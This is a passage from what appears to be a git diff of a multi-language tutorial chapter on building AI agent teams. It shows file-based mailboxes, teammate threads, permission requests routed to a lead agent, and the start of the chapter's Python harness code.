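    """Append to a JSON-array inbox: lock, read, append, write back, unlock."""
    lock = inbox.with_suffix(".lock")
    for _ in range(retries):
        try:
            fd = os.open(lock, os.O_CREAT | os.O_EXCL)  # fails if lock is held
            break
        except FileExistsError:
            time.sleep(0.05)  # another writer holds the lock; retry
    else:
        raise TimeoutError(f"could not lock {inbox}")
    try:
        msgs = json.loads(inbox.read_text()) if inbox.exists() else []
        msgs.append(msg)
        inbox.write_text(json.dumps(msgs, indent=2))
    finally:
        os.close(fd)
        lock.unlink()  # release the lock

inbox = Path(tempfile.mkdtemp()) / "researcher.json"
append_with_lock(inbox, {"from": "lead@my-team", "content": "status?"})
append_with_lock(inbox, {"from": "researcher@my-team", "content": "done"})
print(len(json.loads(inbox.read_text())))  # 2
```

Unlike the tutorial's append-only `.jsonl` inboxes, a JSON array has to be rewritten whole on every send — which is exactly why the real implementation needs a lock.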
+ + diff --git a/s15_agent_teams/README.ja.md b/s15_agent_teams/README.ja.md new file mode 100644 index 000000000..a2f503edf --- /dev/null +++ b/s15_agent_teams/README.ja.md @@ -0,0 +1,259 @@ +# s15: Agent Teams — 一人で無理なら、チームで + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s13 → s14 → `s15` → [s16](../s16_team_protocols/) → s17 → s18 → s19 + +> *"一人で無理なら、チームで"* — 永続化チームメイト + 非同期メールボックス。 +> +> **Harness 層**: チーム — マルチ Agent 協調、メッセージバス。 + +--- + +## 課題 + +レストランの厨房は一人で全部やるわけではない。シェフが調理、助手が仕込み、皿洗いが洗浄 — それぞれの担当があり、窓越しに料理を渡す。シェフに調理と皿洗いの両方をさせたら、提供は遅く、皿も汚いまま。 + +Agent も同じ。「バックエンド全体をリファクタリング」には認証モジュール、データベース層、API ルート、テストが含まれる。1 Agent が API ルートを修正中に認証モジュールの詳細を忘れる。コンテキストウィンドウは限られている。 + +s06 のサブエージェントは臨時スタッフ — 一つの用事で呼んで帰す。しかし、一部のタスクにはいつでも通信できる永続的なチームメイトが必要。 + +--- + +## ソリューション + +![Agent Teams Overview](images/agent-teams-overview.ja.svg) + +s14 の全機能を保持(プロンプト組み立て、エラーリカバリ、タスクグラフ、バックグラウンドスレッド、cron スケジューリング)。3 つの追加:**MessageBus**(ファイル受信箱)、**spawn_teammate_thread**(チームメイトスレッド起動)、**inbox ポーリング**(Lead がチームメイトのメッセージを受信)。 + +サブエージェント vs チームメイト: + +| | s06 サブエージェント | s15 チームメイト | +|---|---|---| +| ライフサイクル | 使い捨て、終了後に破棄 | 永続的、完了または終了まで存続 | +| 通信 | 結論のみ返却 | 非同期受信箱、いつでも通信 | +| コンテキスト | 完全に隔離 | メッセージで情報共有 | +| 数 | 1 メイン Agent + 随時サブ Agent | 1 Lead + 複数チームメイト | + +--- + +## 仕組み + +![Team Topology](images/team-topology.ja.svg) + +### MessageBus: ファイル受信箱 + +各 Agent(Lead とチームメイトを含む)は `.jsonl` メールボックスを持つ。メッセージ送信 = 相手のファイルに JSON 行を追記。メッセージ読み取り = ファイルを読んで削除(消費方式): + +```python +class MessageBus: + def send(self, from_agent: str, to_agent: str, + content: str, msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line 
in inbox.read_text().splitlines()] + inbox.unlink() # 消費方式:読んだら削除 + return msgs +``` + +なぜメモリキューではなくファイル?ファイル追記はスレッド間で安全(原子的 append)、チュートリアルでは `proper-lockfile` のような複雑なロックが不要。CC もファイル受信箱を使う(`~/.claude/teams/{team}/inboxes/`)、ただし並行書き込み衝突を防ぐファイルロック付き。 + +### spawn_teammate_thread: チームメイト起動 + +Lead が `spawn_teammate` ツールを呼び出してチームメイトを起動。チームメイトは独自のデーモンスレッドで実行され、独自の system prompt、独自の messages、独自の簡易ツールセットを持つ: + +```python +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + system = f"You are '{name}', a {role}. Use tools to complete tasks." + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [bash, read_file, write_file, send_message] + for _ in range(10): # 最大 10 ラウンド + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + # ... ツール実行、結果処理 + # 完了後 Lead に summary を送信 + BUS.send(name, "lead", summary, "result") + + threading.Thread(target=run, daemon=True).start() +``` + +主要設計: +- **チームメイトは簡易ツールセット**:bash、read、write、send_message。cron やタスクシステムなどの Lead 専用ツールは不要 +- **最大 10 ラウンド**:チームメイトの無限ループを防止 +- **完了後の自動報告**:`BUS.send(name, "lead", summary)` で最終結果を Lead の受信箱に送信 + +### Lead の inbox ポーリング + +Lead は各メインループ終了後、受信箱をチェック — チームメイトからのメッセージがあるか: + +```python +# メインループ終了後 +inbox = BUS.read_inbox("lead") +if inbox: + print(f"[Inbox: {len(inbox)} messages]") + for msg in inbox: + print(f" From {msg['from']}: {msg['content'][:200]}") +``` + +チュートリアル版はループ外でポーリング。CC はより洗練されており — Lead の `useInboxPoller` が 1 秒ごとにチェックし、新しいメッセージを新しいターンとして提出。 + +### 権限バブリング + +チームメイトが承認が必要な操作(ファイル削除など)に遭遇した場合、自分で決定できない。`permission_request` メッセージを Lead に送り、Lead が最終決定: + +``` +teammate: "config.py を削除したい" → BUS.send("alice", "lead", "...", "permission_request") +Lead: リクエスト受信 → ユーザー承認 → BUS.send("lead", "alice", "approved") +teammate: 返信受信 → 実行継続 +``` + +チュートリアル版は権限バブリングを簡略化。CC 
には専用の `useSwarmPermissionPoller` が 500ms ごとにポーリングし、15 の構造化メッセージタイプがある。 + +### 組み合わせて実行 + +``` +1. Lead: "バックエンド構築:一人で無理、チームを組もう" +2. Lead → spawn_teammate("alice", "backend dev", "データベース schema を作成") +3. Lead → spawn_teammate("bob", "frontend dev", "API クライアントを記述") +4. alice スレッド起動 → 独自の LLM 呼び出し → bash "python manage.py migrate" +5. bob スレッド起動 → 独自の LLM 呼び出し → write_file("client.ts", ...) +6. alice 完了 → BUS.send("alice", "lead", "Schema done: users, orders tables") +7. bob 完了 → BUS.send("bob", "lead", "Client written with types") +8. Lead 次ループ → check_inbox → alice と bob の結果を確認 +``` + +2 人のチームメイトが並行作業、Lead は待たない。 + +--- + +## s14 からの変更 + +| コンポーネント | 変更前 (s14) | 変更後 (s15) | +|--------------|------------|------------| +| Agent 数 | 1 | 1 Lead + N 永続チームメイトスレッド | +| 通信 | なし | MessageBus + .mailboxes/*.jsonl | +| 新規クラス | — | MessageBus, active_teammates dict | +| 新規関数 | — | spawn_teammate_thread, run_send_message, run_check_inbox | +| Lead ツール | 10 (s14) | + spawn_teammate, send_message, check_inbox (13) | +| チームメイトツール | — | bash, read_file, write_file, send_message (4) | +| 権限 | ローカル決定 | Lead にバブリング(チュートリアル版は簡略化) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s15_agent_teams/code.py +``` + +以下のプロンプトを試してください: + +1. `Spawn alice as a backend developer. Ask her to create a file called schema.sql with a users table.` +2. `Check your inbox for alice's result.` +3. `Spawn bob as a tester. Ask him to check if schema.sql exists and list its contents.` + +観察ポイント:Lead はどうやってチームメイトを起動するか?`.mailboxes/` ディレクトリの JSONL ファイルの中身は?チームメイト完了後に Lead の inbox にメッセージが届いているか? + +--- + +## 次の章 + +チームメイトは作業でき、通信もできる。しかし Lead が Alice に終了を指示する際、スレッドを直接 kill すると書きかけのファイルが残る。丁寧なハンドシェイクプロトコルが必要 — "終了してください" → "了解、終了処理をしてから閉じます"。 + +s16 Team Protocols → チームメイト間にも取り決めが必要。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `spawnMultiAgent.ts`、`useInboxPoller.ts`(969 行)、`useSwarmPermissionPoller.ts`(330 行)、`teammateMailbox.ts`、`teamHelpers.ts` の完全分析に基づきます。 + +### 一、中央メッセージバスなし — ファイルシステム + +チュートリアル版は `MessageBus` クラスでメッセージを送受信。CC のアプローチはより直接的:**各 Agent が他の Agent の受信箱ファイルに直接書き込む**。 + +受信箱パス:`~/.claude/teams/{teamName}/inboxes/{agentName}.json` + +書き込み時は `proper-lockfile` で並行安全性を保証(最大 10 リトライ)。各ファイルは JSON 配列、追記時に読み→追加→書き戻し。 + +### 二、15 種のメッセージタイプ + +CC のチーム通信には 15 の構造化メッセージがある(`teammateMailbox.ts`): + +| タイプ | 方向 | 用途 | +|------|------|------| +| `plain text` | 双方向 | 通常のチームメイト間通信 | +| `idle_notification` | チームメイト→Lead | チームメイトが 1 ターン完了、アイドル状態に | +| `permission_request` | チームメイト→Lead | 操作の承認が必要 | +| `permission_response` | Lead→チームメイト | Lead の承認結果 | +| `plan_approval_request` | チームメイト→Lead | 計画のレビュー依頼 | +| `plan_approval_response` | Lead→チームメイト | Lead の計画レビュー | +| `shutdown_request` | Lead→チームメイト | 丁寧な終了要求 | +| `shutdown_approved` | チームメイト→Lead | 終了確認 | +| `shutdown_rejected` | チームメイト→Lead | 終了拒否(理由付き) | +| `task_assignment` | Lead→チームメイト | タスク割り当て | +| `team_permission_update` | Lead→チームメイト | 権限変更のブロードキャスト | +| `mode_set_request` | Lead→チームメイト | チームメイトの権限モード変更 | +| `sandbox_permission_*` | 双方向 | ネットワーク権限リクエスト/返信 | +| `teammate_terminated` | システム | チームメイト削除通知 | + +テキストメッセージは `` XML タグでラップされモデルに配信。 + +### 三、権限バブリング:双方向ポーリング + +チュートリアル版は権限バブリングを簡略化。CC の実際のフロー(`permissionSync.ts`): + +1. **チームメイト**が承認が必要な操作に遭遇 → `permission_request` を Lead の受信箱に送信 +2. **Lead** の `useInboxPoller`(1 秒ごとにポーリング)がリクエストを検出 → `ToolUseConfirmQueue` にルーティング +3. Lead の UI にチームメイト名と色付きの承認ダイアログを表示 +4. ユーザー承認後 → Lead が `permission_response` をチームメイトの受信箱に返信 +5. **チームメイト**の `useSwarmPermissionPoller`(500ms ごとにポーリング)が返信を受信 → 実行継続または拒否 + +### 四、チームメイトライフサイクル + +CC のチームメイトは `spawnTeammate()`(`spawnMultiAgent.ts`)で作成: + +1. **Spawn**:tmux ペイン(またはプロセス内)を作成、色を割り当て、team config に書き込み +2. **Work**:`useInboxPoller` が 1 秒ごとに受信箱をチェック → 新メッセージを新しいターンとして提出 +3. 
**Idle**:Stop hook が発火 → `idle_notification` を Lead に送信 +4. **Shutdown**:Lead が `shutdown_request` を送信 → チームメイトが `shutdown_approved` で返信 → Lead がクリーンアップ + +### 五、Team Config + +チーム登録簿は `~/.claude/teams/{teamName}/config.json`(`teamHelpers.ts`): + +```json +{ + "name": "my-team", + "leadAgentId": "lead@my-team", + "members": [{ + "agentId": "researcher@my-team", + "name": "researcher", + "agentType": "general-purpose", + "color": "blue", + "isActive": true + }] +} +``` + +チームメイトはネスト不可(`AgentTool.tsx:273` で "teammates spawning other teammates" を明示的に禁止)。 + +
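上の三節の権限バブリング往復(permission_request → 承認 → permission_response)は、チュートリアル版のファイル受信箱だけで逐次的に再現できる。最小スケッチ(LLM もスレッドも使わない例示。パスは一時ディレクトリを仮定):

```python
import json
import tempfile
import time
from pathlib import Path

MAILBOX_DIR = Path(tempfile.mkdtemp())  # .mailboxes/ の代わり

def send(from_agent: str, to_agent: str, content: str,
         msg_type: str = "message") -> None:
    msg = {"from": from_agent, "to": to_agent, "content": content,
           "type": msg_type, "ts": time.time()}
    with open(MAILBOX_DIR / f"{to_agent}.jsonl", "a") as f:
        f.write(json.dumps(msg) + "\n")

def read_inbox(agent: str) -> list[dict]:
    inbox = MAILBOX_DIR / f"{agent}.jsonl"
    if not inbox.exists():
        return []
    msgs = [json.loads(line) for line in inbox.read_text().splitlines()]
    inbox.unlink()  # 消費方式:読んだら削除
    return msgs

# 1. チームメイト → Lead: 承認が必要な操作を報告
send("alice", "lead", "config.py を削除したい", "permission_request")

# 2. Lead 側: 受信箱をポーリングし、リクエストに返信
for msg in read_inbox("lead"):
    if msg["type"] == "permission_request":
        send("lead", msg["from"], "approved", "permission_response")

# 3. チームメイト側: 返信を受信して続行
reply = read_inbox("alice")[0]
print(reply["type"], reply["content"])  # permission_response approved
```

実際の CC では手順 2 と 3 が 1 秒 / 500ms のポーリングスレッドで非同期に回る点だけが異なる。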
+ + diff --git a/s15_agent_teams/README.md b/s15_agent_teams/README.md new file mode 100644 index 000000000..475eb7428 --- /dev/null +++ b/s15_agent_teams/README.md @@ -0,0 +1,259 @@ +# s15: Agent Teams — 一个搞不定,组队来 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s13 → s14 → `s15` → [s16](../s16_team_protocols/) → s17 → s18 → s19 + +> *"一个搞不定, 组队来"* — 持久化队友 + 异步邮箱。 +> +> **Harness 层**: 团队 — 多 Agent 协作, 消息总线。 + +--- + +## 问题 + +饭店厨房不是一个人干所有活。厨师炒菜,帮厨备料,洗碗工洗碗——各管一摊,通过窗口传菜。如果让厨师又炒菜又洗碗,出品一定慢,碗还洗不干净。 + +Agent 也一样。"重构整个后端"涉及认证模块、数据库层、API 路由、测试。一个 Agent 在修 API 路由时会忘记认证模块的细节。上下文窗口就那么大。 + +s06 的子 Agent 是临时工——叫来干一件事就走了。但有些任务需要持久的、能随时通信的队友。 + +--- + +## 解决方案 + +![Agent Teams Overview](images/agent-teams-overview.svg) + +s14 的全部能力保留(prompt 组装、错误恢复、任务图、后台线程、cron 调度)。新增三样:**MessageBus**(文件收件箱)、**spawn_teammate_thread**(启动队友线程)、**inbox 轮询**(Lead 接收队友消息)。 + +子 Agent vs 队友: + +| | s06 子 Agent | s15 队友 | +|---|---|---| +| 生命周期 | 一次性,用完销毁 | 持久化,活到做完或被关 | +| 通信 | 只回传结论 | 异步收件箱,随时通信 | +| 上下文 | 完全隔离 | 通过消息共享信息 | +| 数量 | 一个主 Agent + 偶尔子 Agent | 一个 Lead + 多个队友 | + +--- + +## 工作原理 + +![Team Topology](images/team-topology.svg) + +### MessageBus: 文件收件箱 + +每个 Agent(包括 Lead 和队友)有一个 `.jsonl` 邮箱。发消息 = 往对方的文件里 append 一行 JSON。读消息 = 读文件 + 删除(消费式): + +```python +class MessageBus: + def send(self, from_agent: str, to_agent: str, + content: str, msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines()] + inbox.unlink() # 消费式:读完删除 + return msgs +``` + +为什么用文件而不是内存队列?因为文件跨线程安全(append 是原子操作),而且教学版不需要 `proper-lockfile` 这种复杂锁。CC 也用文件收件箱(`~/.claude/teams/{team}/inboxes/`),只是加了文件锁防并发写冲突。 + +### 
spawn_teammate_thread: 启动队友 + +Lead 调用 `spawn_teammate` 工具启动一个队友。队友跑在自己的 daemon 线程里,有自己的 system prompt、自己的 messages、自己的简化工具集: + +```python +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + system = f"You are '{name}', a {role}. Use tools to complete tasks." + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [bash, read_file, write_file, send_message] + for _ in range(10): # 最多 10 轮 + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + # ... 执行工具、处理结果 + # 完成后发 summary 给 Lead + BUS.send(name, "lead", summary, "result") + + threading.Thread(target=run, daemon=True).start() +``` + +关键设计: +- **队友有简化工具集**:bash、read、write、send_message。不需要 cron、任务系统这些 Lead 专属工具 +- **最多 10 轮**:防止队友无限循环 +- **完成后自动汇报**:`BUS.send(name, "lead", summary)` 把最终结果发到 Lead 的收件箱 + +### Lead 的 inbox 轮询 + +Lead 在每轮主循环结束后检查收件箱——有没有队友发来的消息: + +```python +# 主循环结束后 +inbox = BUS.read_inbox("lead") +if inbox: + print(f"[Inbox: {len(inbox)} messages]") + for msg in inbox: + print(f" From {msg['from']}: {msg['content'][:200]}") +``` + +教学版在循环外轮询。CC 更精细——Lead 的 `useInboxPoller` 每 1 秒检查一次,有消息就提交为新的 turn。 + +### 权限冒泡 + +队友遇到需要审批的操作(比如删除文件),不能自己做主。它发 `permission_request` 消息给 Lead,Lead 来做最终决定: + +``` +teammate: "我要删除 config.py" → BUS.send("alice", "lead", "...", "permission_request") +Lead: 收到请求 → 用户审批 → BUS.send("lead", "alice", "approved") +teammate: 收到回复 → 继续执行 +``` + +教学版简化了权限冒泡——CC 有专门的 `useSwarmPermissionPoller` 每 500ms 轮询,还有结构化的 15 种消息类型。 + +### 合起来跑 + +``` +1. Lead: "搭建后端:一个人搞不定,组队吧" +2. Lead → spawn_teammate("alice", "backend dev", "创建数据库 schema") +3. Lead → spawn_teammate("bob", "frontend dev", "写 API 客户端") +4. alice 线程启动 → 自己的 LLM 调用 → bash "python manage.py migrate" +5. bob 线程启动 → 自己的 LLM 调用 → write_file("client.ts", ...) +6. 
alice 完成 → BUS.send("alice", "lead", "Schema done: users, orders tables") +7. bob 完成 → BUS.send("bob", "lead", "Client written with types") +8. Lead 下次循环 → check_inbox → 看到 alice 和 bob 的结果 +``` + +两个队友并行工作,Lead 不干等。 + +--- + +## 相对 s14 的变更 + +| 组件 | 之前 (s14) | 之后 (s15) | +|------|-----------|-----------| +| Agent 数量 | 1 | 1 Lead + N 持久队友线程 | +| 通信 | 无 | MessageBus + .mailboxes/*.jsonl | +| 新类 | — | MessageBus, active_teammates dict | +| 新函数 | — | spawn_teammate_thread, run_send_message, run_check_inbox | +| Lead 工具 | 10 (s14) | + spawn_teammate, send_message, check_inbox (13) | +| 队友工具 | — | bash, read_file, write_file, send_message (4) | +| 权限 | 本地决策 | 冒泡到 Lead(教学版简化) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s15_agent_teams/code.py +``` + +试试这些 prompt: + +1. `Spawn alice as a backend developer. Ask her to create a file called schema.sql with a users table.` +2. `Check your inbox for alice's result.` +3. `Spawn bob as a tester. Ask him to check if schema.sql exists and list its contents.` + +观察重点:Lead 如何启动队友?`.mailboxes/` 目录下的 JSONL 文件长什么样?队友完成后 Lead 的 inbox 有没有收到消息? + +--- + +## 接下来 + +队友能干活、能通信。但如果 Lead 想让 Alice 关机,直接杀线程会留下写到一半的文件。需要一个体面的握手协议——"请关机"→"好的,我收尾完就关"。 + +s16 Team Protocols → 队友之间也需要约定。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `spawnMultiAgent.ts`、`useInboxPoller.ts`(969 行)、`useSwarmPermissionPoller.ts`(330 行)、`teammateMailbox.ts`、`teamHelpers.ts` 的完整分析。 + +### 一、没有中央消息总线——是文件系统 + +教学版用 `MessageBus` 类收发消息。CC 的做法更直接:**每个 Agent 直接写其他 Agent 的收件箱文件**。 + +收件箱路径:`~/.claude/teams/{teamName}/inboxes/{agentName}.json` + +写入时用 `proper-lockfile` 文件锁保证并发安全(最多重试 10 次)。每个文件是一个 JSON 数组,append 新消息时读→追加→写回。 + +### 二、15 种消息类型 + +CC 的团队通信有 15 种结构化消息(`teammateMailbox.ts`): + +| 类型 | 方向 | 用途 | +|------|------|------| +| `plain text` | 双向 | 普通队友间通信 | +| `idle_notification` | 队友→Lead | 队友完成一轮工作,进入空闲 | +| `permission_request` | 队友→Lead | 队友需要操作审批 | +| `permission_response` | Lead→队友 | Lead 审批结果 | +| `plan_approval_request` | 队友→Lead | 队友提交计划待审 | +| `plan_approval_response` | Lead→队友 | Lead 审批计划 | +| `shutdown_request` | Lead→队友 | 请求体面关机 | +| `shutdown_approved` | 队友→Lead | 确认关机 | +| `shutdown_rejected` | 队友→Lead | 拒绝关机(附原因) | +| `task_assignment` | Lead→队友 | 分配任务 | +| `team_permission_update` | Lead→队友 | 广播权限变更 | +| `mode_set_request` | Lead→队友 | 修改队友的权限模式 | +| `sandbox_permission_*` | 双向 | 网络权限请求/回复 | +| `teammate_terminated` | 系统 | 队友被移除通知 | + +文本消息被包装在 `` XML 标签中交付给模型。 + +### 三、权限冒泡:双向轮询 + +教学版简化了权限冒泡。CC 的实际流程(`permissionSync.ts`): + +1. **队友**遇到需要审批的操作 → 发 `permission_request` 到 Lead 的收件箱 +2. **Lead** 的 `useInboxPoller`(每 1 秒轮询)检测到请求 → 路由到 `ToolUseConfirmQueue` +3. Lead 的 UI 显示审批对话框,带队友名字和颜色 +4. 用户审批后 → Lead 发 `permission_response` 回队友的收件箱 +5. **队友**的 `useSwarmPermissionPoller`(每 500ms 轮询)收到回复 → 继续或拒绝执行 + +### 四、队友生命周期 + +CC 的队友由 `spawnTeammate()`(`spawnMultiAgent.ts`)创建: + +1. **Spawn**:创建 tmux 窗格(或进程内),分配颜色,写入 team config +2. **Work**:`useInboxPoller` 每 1 秒检查收件箱 → 有消息就提交为新的 turn +3. **Idle**:Stop hook 触发 → 发 `idle_notification` 给 Lead +4. 
**Shutdown**:Lead 发 `shutdown_request` → 队友回复 `shutdown_approved` → Lead 清理 + +### 五、Team Config + +团队注册表在 `~/.claude/teams/{teamName}/config.json`(`teamHelpers.ts`): + +```json +{ + "name": "my-team", + "leadAgentId": "lead@my-team", + "members": [{ + "agentId": "researcher@my-team", + "name": "researcher", + "agentType": "general-purpose", + "color": "blue", + "isActive": true + }] +} +``` + +队友之间不能嵌套(`AgentTool.tsx:273` 明确禁止 "teammates spawning other teammates")。 + +
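+第一节提到的"读 → 追加 → 写回 + 文件锁"流程,可以用标准库粗略示意。注意这只是教学假设下的草图:用 `fcntl.flock` 代替 CC 实际使用的 `proper-lockfile`(仅 Unix 可用),重试 10 次与 CC 的重试次数对应,路径与字段名均为示意,并非 CC 源码:
+
+```python
+# 示意:带文件锁的收件箱追加(读 → 追加 → 写回)。
+# 假设:用 fcntl.flock 模拟 proper-lockfile 的互斥(仅 Unix 可用)。
+import fcntl
+import json
+import time
+from pathlib import Path
+
+
+def append_message(inbox: Path, msg: dict, retries: int = 10) -> None:
+    lock_path = inbox.with_suffix(".lock")
+    for _ in range(retries):
+        with open(lock_path, "w") as lock:
+            try:
+                fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
+            except BlockingIOError:
+                time.sleep(0.05)   # 锁被其他写入者占用,稍后重试
+                continue
+            msgs = json.loads(inbox.read_text()) if inbox.exists() else []
+            msgs.append(msg)       # 整个收件箱文件是一个 JSON 数组
+            inbox.write_text(json.dumps(msgs, ensure_ascii=False))
+            return                 # with 退出时关闭文件,锁自动释放
+    raise TimeoutError(f"could not acquire lock for {inbox}")
+```
+
+对比教学版的 `.jsonl` append:JSON 数组格式每次都要整读整写,所以必须加锁;`.jsonl` 靠单次 append 的原子性绕开了这个问题,代价是不能原地修改历史消息。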
+ + diff --git a/s15_agent_teams/code.py b/s15_agent_teams/code.py new file mode 100644 index 000000000..3da8cfcf6 --- /dev/null +++ b/s15_agent_teams/code.py @@ -0,0 +1,734 @@ +#!/usr/bin/env python3 +""" +s15: Agent Teams — MessageBus + spawn_teammate_thread + inbox polling. + +Run: python s15_agent_teams/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s14: + - MessageBus class: file-based mailboxes (.mailboxes/*.jsonl) + - spawn_teammate_thread: creates teammate in background thread + - Teammate runs own simplified agent_loop (bash, read, write, send_message) + - Lead tools: spawn_teammate, send_message, check_inbox (3 new) + - Lead checks inbox after each turn for teammate responses + - Permission bubbling: simplified (teammate → Lead inbox) + +ASCII flow: + Lead: cron_queue → messages → prompt → LLM → TOOLS ────→ loop + ↑ ↓ | + └── inbox ← MessageBus ← teammate.send_message ←┘ + Teammate: inbox → LLM → bash/read/write/send → loop (max 10 turns) +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12, unchanged) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = 
None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.",
+    "tools": "Available tools: bash, read_file, write_file, "
+             "create_task, list_tasks, claim_task, complete_task, "
+             "schedule_cron, list_crons, cancel_cron, "
+             "spawn_teammate, send_message, check_inbox.",
+    "workspace": f"Working directory: {WORKDIR}",
+    "planning": "For multi-step tasks, create tasks with create_task first.",
+    "skills": "Skills are on demand: list_skills → load_skill.",
+    "team": "You can spawn teammate agents for parallel work. "
+            "Use send_message to communicate, check_inbox to read replies.",
+    "cron": "Use schedule_cron for recurring or scheduled tasks.",
+    "memory": "Relevant memories are injected below when available.",
+}
+
+
+def assemble_system_prompt(context: dict) -> str:
+    sections = [PROMPT_SECTIONS["identity"],
+                PROMPT_SECTIONS["tools"],
+                PROMPT_SECTIONS["workspace"]]
+    if context.get("has_todos"):
+        sections.append(PROMPT_SECTIONS["planning"])
+    if context.get("has_skills"):
+        sections.append(PROMPT_SECTIONS["skills"])
+    if context.get("has_team"):
+        sections.append(PROMPT_SECTIONS["team"])
+    if context.get("has_cron"):
+        sections.append(PROMPT_SECTIONS["cron"])
+    if context.get("memories"):
+        sections.append(f"Relevant memories:\n{context['memories']}")
+    return "\n\n".join(sections)
+
+
+_last_context_hash, _last_prompt = None, None
+
+
+def get_system_prompt(context: dict) -> str:
+    global _last_context_hash, _last_prompt
+    h = hash(frozenset(context.items()))
+    if h == _last_context_hash and _last_prompt:
+        return _last_prompt
+    _last_context_hash, _last_prompt = h, assemble_system_prompt(context)
+    return _last_prompt
+
+
+# ── Tools (from s14, unchanged) ──
+
+def safe_path(p: str) -> Path:
+    path = (WORKDIR / p).resolve()
+    if not path.is_relative_to(WORKDIR):
+        raise ValueError(f"Path escapes workspace: {p}")
+    return path
+
+
+def run_bash(command: str) -> str:
+    try:
+        r = subprocess.run(command, shell=True, cwd=WORKDIR,
+                           capture_output=True, text=True, timeout=120)
+        out = (r.stdout + r.stderr).strip()
+ return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." 
